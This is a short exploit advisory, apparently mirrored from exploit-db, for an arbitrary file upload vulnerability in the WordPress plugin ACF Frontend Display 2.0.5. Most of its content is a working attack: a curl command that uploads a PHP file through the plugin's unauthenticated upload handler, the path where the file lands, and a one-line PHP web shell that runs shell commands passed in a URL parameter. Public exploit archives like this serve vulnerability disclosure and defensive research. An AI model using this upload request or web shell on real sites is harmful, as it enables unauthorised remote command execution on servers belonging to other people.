WordPress Plugin ACF Frontend Display 2.0.5 – Arbitrary File Upload

  • 作者: TUNISIAN CYBER
    日期: 2015-07-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37514/
  • +---------------------------------------------------------------------------+ 
    #[+] Author: TUNISIAN CYBER 
    #[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
    #[+] Date: 3-07-2015 
    #[+] Type: WebAPP 
    #[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
    #[+] Tested on: KaliLinux 
    #[+] Friendly Sites: sec4ever.com 
    #[+] Twitter: @TCYB3R 
    +---------------------------------------------------------------------------+ 
    
    curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 
    
    File Path: site/wp-content/uploads/uigen_YEAR/file.php 
    Example: site/wp-content/uploads/uigen_2015/evil.php 
    evil.php: <?php passthru($_GET['cmd']); ?> 
    
    
    TUNISIAN CYBER(miutex)-S4E